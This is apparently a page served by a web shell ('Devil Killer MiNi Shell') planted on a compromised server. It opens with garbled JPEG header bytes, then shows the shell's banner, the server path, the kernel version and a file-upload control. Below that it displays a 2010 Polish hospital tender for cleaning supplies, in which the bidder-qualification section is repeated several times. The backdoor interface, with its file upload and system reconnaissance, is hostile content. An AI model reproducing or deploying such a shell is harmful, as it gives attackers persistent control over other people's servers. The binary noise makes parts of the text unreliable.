JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100326/67511-N-2010.html

<p class="kh_header"><b>Międzyrzecz: DOSTAWY DO SP ZOZ MIĘDZYRZECZ   ARTYKUŁÓW CHEMII GOSPODARCZEJ</b><br>
<b>Numer ogłoszenia: 67511 - 2010; data zamieszczenia: 26.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Konstytucji 3 Maja 35, 66-300 Międzyrzecz, woj. lubuskie, tel. 095 7428298.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY DO SP ZOZ MIĘDZYRZECZ   ARTYKUŁÓW CHEMII GOSPODARCZEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWY DO SP ZOZ MIĘDZYRZECZ   ARTYKUŁÓW CHEMII GOSPODARCZEJ
Pakiet nr 1
Lp	Asortyment	Jednostka miary	Ilość  w skali roku	
1.	Płyn do  mycia naczyń w zmywarkach profesionalnych z przeznaczeniem do wszystkich twardości wody, zawierający fosforany, związki wybielające na bazie chloru, wartość Ph 12,5-13,00. Wygodny w użyciu i dozowaniu granulat, nie tworzący piany. Pakowany po 10 kg, dozowanie 1-4 g/1 litr.	L	500	
2.	Środek (koncentrat) myjąco - dezynfekujący, działający na bakterie i grzyby na wszystkich powierzchniach i urządzeniach kuchennych w ciągu 5 minut, o Ph 9,5 - 10,5. Roztwór 1-2%, opakowanie 1 l, dozowany przez system PENQUIN, zgodny z normą europejską EN 1276, EN 1650, EN 13697	L 	4	
3.	Skoncentrowany płyn do usuwania osadów mineralnych,czas dezynfekcji 10-20 min, Ph 1,9 ( 1 koncentrat), temperatura 35 - 65 stopni  Celsjusza, skład - środki powierzchniowo-czynne, kwas fosforowy, kwas azotowy, zdolność do biologicznej neutralizacji, zgodny z normą ISO - 9002, kanister 5 l 	L  	10	
4.	Płyn ( koncentrat) do dezynfekcji powierzchni kuchennych, sprzętu kuchennego, zgodny z normą ISO 9002, skład - tenzydy  czwartorzędowe, zdolność do biologicznej neutralizacji, wartość Ph 10-11, opakowanie 5l, bezpieczne dozowanie przez urządzeniec dozujące, czas dezynfekcji 15 minut	L 	10	
5.	Środek do usuwania silnie zatłuszczonych i przypalonych powierzchni, lalnister 5 l, skład - amonowe i amfoteryczne związki powierzchniowo czynne, wodorotlenek sodu, 2-aminoetanol, alkiloaminotlenki, czas działania 10 - 15 minut	L 	10	
6.	Alkaliczny środek do czyszczenia posadzek kuchennych	L  	20	
7.	Preparat do mycia i dezynfekcji rąk, bez barwników i substancji zapachowych, szczególnie przydatny w kuchniach, skład - propanol, tridosan, opakowanie 1 l , dozowanie przez dozownik, chroni skórę rąk przed wysuszeniem	L  	20	
8.	Uniwersalny koncentrat czyszczący do zmywalnych powierzchni o ph 7-8	L  	30	
9.	Emulsja do powlekania posadzek szpitalnych, dajedługotrwałą powłokę polinerową, dla placówek służby zdrowia, odporny na działanie środków na bazie alkoholu i środków dezynfekcyjnych, opakowanie 5 l	L  	250	
10.	Środek myjąco - dezynfekujący do urządzeń sanitarnych, posiadający silne właściwości zmywające, wykazujący działanie baktewriobójcze, wirusobójcze, doskonale czyszczący i wybielający, czasdziałania do 15 minut, skład - anionowe i niejenowe środki powierzchniowe czynne, roztwór wodorotlenku potasu, roztwór podchlorynu sodu, substancje zapachowe, opakowanie 1 litrowe, idealny do materiałów wrażliwych na działanie kwasów, np. - fugi.	L 	50	
11.	Płyn do mycia powierzchni szklanych na bazie alkoholu, usuwający tłuste zabrudzenia, naloty i osady z nikotyny, łagodny dla skóry rąk, wartość Ph - 7, kanister 10 l	L  	150	
12.	Skoncentrowany płyn do mycia naczyń , dozowanie - ok.8 ml na 10 L wody, kanister 10 L	L  	400	
13.	Środek (koncentrat) do codziennego mycia podłóg - ręcznego i maszynowego, na bazie amoniaku, o ph - 10,5 - w kanistrach 10 L, skład- anilonowe i niejonowe tenzydy 2-7% NTA, kwas nitryloocetowy	L  	400	
14.	Zapachowy środek czyszczący do posadzek, o ph 7, na anionowych środkach powierzchniowo czynnych, w kanistrach 10 L, zapewniający trwałe uczucie świeżości i czystości, skutecznie pochłania i usówa brud, nie pozostawiający smug i powłok, może być stosowany na zakonserwowanych jk i nie zakonserwowanych powierzchniach	L  	400	
15.	Środek do czyszczenia łazienek, sanitariatów ,szybko i skutecznie usuwający osady z kamienia, mydła i rdzy, nie pozostawiający śladów i smug, konsystencji żelowej, zawierający tenzydy anionowe, organicznie kwaśny, lalnister 10 l, zapewnia długotrwały, świeży zapach	L  	40	
16.	Ściereczki duże, bardzo chłonne - z łatwym wyżymaniem, mięsiste w dotyku, o wymiarach każda - 38 cm x 40 cm, w kolorach: niebieskim, żółtym, zielonym, różowym, możliwość prania w tremp. 95 stopni, bardzo chłonne	SZT  	3000	
17.	Ściereczki małe o falistej strukturze, zwiększające przyjmowanie brudu, z domieszką mikrofazy, możliwość prania w 600 C, o wymiarach każda - 35 cm x 35c m w kolorach:niebieskim,żółtym,zielonym,czerwony, wykonane w technologii norlon ( torebki wyłapujące)	SZT  	3000	
18.	Ściereczka w rolce o szer.25 cm i dług. 10 m, w kolorze niebieskim, wysoka chłonność wody, tłuszczu, z włókien naturalnych, nie pozostawia smug, zacieków, kłaczków	SZT 	20	
19.	Gąbka do szorowania z zielonym padem ,                   format 7 x 15 cm	SZT 	400	
20.	Czyścik do szorowania trudnych zabrudzeń, nie zawiera metali, taliowany kształt	SZT  	50	
21.	Mydło w płynie, białe, w kanistrze	L 	500	
22.	Kostka w koszyczku do WC	SZT  	200	
23.	Ręczniki składane typu zz, kolor natura, karton po 5000 szt.	KARTON  	200	
24.	Dozowniki na ręczniki składane do poz. 23	SZT  	20	
25.	Papier toaletowy typu Jumbo, szary, pakowany po 12 rolek, min.130 m  p06062	OPAKOWANIE  	200	
26.	Pojemnik na papier do poz. 25	SZT 	10	
27.	Worki na odpady medyczne - LDPE, w kolorach: czerwonym, niebieskim i żółtym,        o pojemności każdy 120 litrów	OPAKOWANIE-ROLKApo 25 sztuk	2500:1000 niebieskich1000 czerwonych100 żółtych	
28.	Worki na odpady medyczne - LDPE, w kolorach: czerwonym, niebieskim i żółtym,        o pojemności każdy 60 litrów	OPAKOWANIE-ROLKApo 20 sztuk	2500:1000 niebieskich1000 czerwonych300 żółtych	
29.	Worki na odpady medyczne - LDPE, w kolorach: czerwonym, niebieskim i żółtym,        o pojemności każdy 35 litrów	OPAKOWANIE-ROLKApo 20 sztuk	2500:1000 niebieskich1000 czerwonych300 żółtych	
30.	Worki na odpady komunalne - LDPE, w kolorzeczarnym o pojemnościach: 120, 60 i 35 litrów	OPAKOWANIE-ROLKApo 20-25 sztuk	120l -200060l - 200035l- 1000	
31.	Zestaw do mycia okien, dwustronny (guma ściągająca + nakładka bawełniana), szerokość 35 cm	SZTUKA	10	
32.	Kij teleskopowy  - 2 x 1,25 do pozycji nr 31	SZTUKA	10	
33.	Ściągaczka do zbierania wody z posadzek, szer. 60 cm, kompletna z kijem	SZTUKA	10	
34.	Mopy bawełniane do stelaży - KLIK PLUS, szer. 40 cm	SZTUKA	300	
35.	Mopy bawełniane do stelaży - KLIK PLUS, szer. 50 cm	SZTUKA	300	
36.	Stelaże do mopów do pozycji nr 34	SZTUKA	10	
37.	Stelaże do mopów do pozycji nr 35	SZTUKA	10	
38.	Kije do stelaży na mopy - KLIK PLUS do pozycji nr 36	SZTUKA	10	
39.	Kije do stelaży na mopy - KLIK PLUS do pozycji nr 37	SZTUKA	10	
40	Zmiotka + szufelka - typu leniuch	Sztuka	10	

Oferowane przez dostawcę w/w preparaty muszą spełniać normy określone w Rejestrze Produktów Leczniczych Wyrobów Medycznych Materiałów Produktów Biobójczych  dopuszczonych do obrotu w Polsce - do potwierdzenia kopiami na życzenie Zamawiającego.

Pakiet nr 2

Lp.	Asortyment	Jednostka miary	Ilość  w skali roku	
1.	Szczotki ryżowe do szorowania podłóg, szer. 20-30 cm, z kijem	SZTUKA	20	
2.	Szczotka z włosiem twardym bądź mieszanym, do zamiatania, szer. 30-40 cm, z kijem 	SZTUKA	20	
3.	Zmiotka z szufelką, plastikowa	SZTUKA	15	
4.	Szczotka z pojemnikiem do toalet	SZTUKA	30	
5.	Płyn nabłyszczający do paneli	L	20	
6.	Zmywacz do pasty samopołyskowej	L	100	
7.	Środek do udrażniania rur typu kret	SZTUKA	100	
8.	Mleczko do mycia baterii kranowych	L	100	
9.	Proszek do czyszczenia typu IZO lub równoważny a 500 g	SZTUKA	200	
10.	Środek skoncentrowany do usuwania kamienia i rdzy	L	200	
11.	Płyn - żel do WC typu Tytan lub równoważny	L	300	
12.	Pianka do czyszczenia mebli a 400 ml	SZTUKA	20	
13.	Odświeżacz powietrza w sprayu a 300 ml	SZTUKA	300	
14.	Szampon dla dzieci typu Bambino a 250 ml	SZTUKA	35	
15.	Szampon dla dorosłych a 250	SZTUKA	35	
16.	Środek nabłyszczający do płukania naczyń  w zmywarkach	L	20	
17.	Sól do zmywarek	KG	50	
19	Pasta bhp- żel	Kg	90 a 0,5 kg	
20	Proszek do prania	Kg	80	
21	Płyn do płukania tkanin	L	10	
22.	Rękawice gospodarcze	OPAKOWAN a 12 szt	50	
23.	Worki do żywności 1,20 x 0,90	OPAKOWAN a 100 szt	20	
24.	Worki do żywności 0,90 x 0,60	OPAKOWAN a 100 szt	20	
25.	Woreczki śniadaniowe	OPAKOWAN a 100 szt	40	
26.	Reklamówki białe bez nadruku	OPAKOWAN a 200 szt	30	
27.	Serwetki papierowe	OPAKOWAN a 500 szt	30	
28.	Pojemnik styropianowy dwudzielny	Szt	500	
29.	Pojemnik obiadowy trójdzielny z pokrywką	OPAKOWAN a 100 szt	500	
30	Pojemnik jednorazowy 450 ml z wieczkiem	Sop.a 100 sazt	100	
31	Pojemnik jednorazowy 500ml z wieczkiem	Opakowanie a 100 szt	100	
32.	Sztućce jednorazowe:NóżWidelecŁyżkałyżeczka	OPAKOWAN a 100 szt	Po 20 opakowąn.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 24.95.50.00-3, 39.83.00.00-9, 33.71.16.10-6, 33.76.00.00-5, 33.76.30.00-6, 33.71.19.00-6, 39.81.21.00-8, 39.81.30.00-4, 39.22.40.00-8, 39.22.43.10-4, 39.22.43.30-0, 39.22.43.20-7, 33.74.12.00-8, 39.81.30.00-4, 39.22.11.30-7, 39.81.11.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art.22 ust.1 pkt. 1-4 ustawy - Wykonawca zobowiązany jest złożyć Oświadczenie.

Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art.24 ust.1 ustawy- Wykonawca zobowiązany jest złożyć Oświadczenie oraz dokumenty wskazane w punkcie VI
Lp	Nazwa dokumentu potwierdzającego	Wymagany dokument
1	1 Aktualny odpis z właściwego rejestru	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
2	 informacja z Krajowego Rejestru Karnego w zakresie art. 24 ust. 1 pkt 4 - 8 Prawa Zamówień Publicznych 	równoważne zaświadczenie z właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 -8 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3	Informacja z Krajowego Rejestru Karnego w zakresie art. 24 ust. 1 pkt 9 Prawa Zamówień Publicznych	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z wyłączeniem przedsiębiorców indywidualnych oraz prowadzących działalność w formie spółki cywilnej.
4	Dokumenty poświadczające sytuację ekonomicznej i finansową Wykonawcy zapewniającej wykonanie Zamówienia	każdy z Wykonawców powinien złożyć oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. 
5	Zaświadczenie z właściwego organu podatkowego oraz ZUS 	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art.22 ust.1 pkt. 1-4 ustawy - Wykonawca zobowiązany jest złożyć Oświadczenie.

Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art.24 ust.1 ustawy- Wykonawca zobowiązany jest złożyć Oświadczenie oraz dokumenty wskazane w punkcie VI
Lp	Nazwa dokumentu potwierdzającego	Wymagany dokument
1	1 Aktualny odpis z właściwego rejestru	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
2	 informacja z Krajowego Rejestru Karnego w zakresie art. 24 ust. 1 pkt 4 - 8 Prawa Zamówień Publicznych 	równoważne zaświadczenie z właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 -8 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3	Informacja z Krajowego Rejestru Karnego w zakresie art. 24 ust. 1 pkt 9 Prawa Zamówień Publicznych	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z wyłączeniem przedsiębiorców indywidualnych oraz prowadzących działalność w formie spółki cywilnej.
4	Dokumenty poświadczające sytuację ekonomicznej i finansową Wykonawcy zapewniającej wykonanie Zamówienia	każdy z Wykonawców powinien złożyć oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. 
5	Zaświadczenie z właściwego organu podatkowego oraz ZUS 	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art.22 ust.1 pkt. 1-4 ustawy - Wykonawca zobowiązany jest złożyć Oświadczenie.

Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art.24 ust.1 ustawy- Wykonawca zobowiązany jest złożyć Oświadczenie oraz dokumenty wskazane w punkcie VI
Lp	Nazwa dokumentu potwierdzającego	Wymagany dokument
1	1 Aktualny odpis z właściwego rejestru	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
2	 informacja z Krajowego Rejestru Karnego w zakresie art. 24 ust. 1 pkt 4 - 8 Prawa Zamówień Publicznych 	równoważne zaświadczenie z właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 -8 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3	Informacja z Krajowego Rejestru Karnego w zakresie art. 24 ust. 1 pkt 9 Prawa Zamówień Publicznych	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z wyłączeniem przedsiębiorców indywidualnych oraz prowadzących działalność w formie spółki cywilnej.
4	Dokumenty poświadczające sytuację ekonomicznej i finansową Wykonawcy zapewniającej wykonanie Zamówienia	każdy z Wykonawców powinien złożyć oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. 
5	Zaświadczenie z właściwego organu podatkowego oraz ZUS 	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art.22 ust.1 pkt. 1-4 ustawy - Wykonawca zobowiązany jest złożyć Oświadczenie.

Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art.24 ust.1 ustawy- Wykonawca zobowiązany jest złożyć Oświadczenie oraz dokumenty wskazane w punkcie VI
Lp	Nazwa dokumentu potwierdzającego	Wymagany dokument
1	1 Aktualny odpis z właściwego rejestru	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
2	 informacja z Krajowego Rejestru Karnego w zakresie art. 24 ust. 1 pkt 4 - 8 Prawa Zamówień Publicznych 	równoważne zaświadczenie z właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 -8 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3	Informacja z Krajowego Rejestru Karnego w zakresie art. 24 ust. 1 pkt 9 Prawa Zamówień Publicznych	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z wyłączeniem przedsiębiorców indywidualnych oraz prowadzących działalność w formie spółki cywilnej.
4	Dokumenty poświadczające sytuację ekonomicznej i finansową Wykonawcy zapewniającej wykonanie Zamówienia	każdy z Wykonawców powinien złożyć oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. 
5	Zaświadczenie z właściwego organu podatkowego oraz ZUS 	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art.22 ust.1 pkt. 1-4 ustawy - Wykonawca zobowiązany jest złożyć Oświadczenie.

Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art.24 ust.1 ustawy- Wykonawca zobowiązany jest złożyć Oświadczenie oraz dokumenty wskazane w punkcie VI
Lp	Nazwa dokumentu potwierdzającego	Wymagany dokument
1	1 Aktualny odpis z właściwego rejestru	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
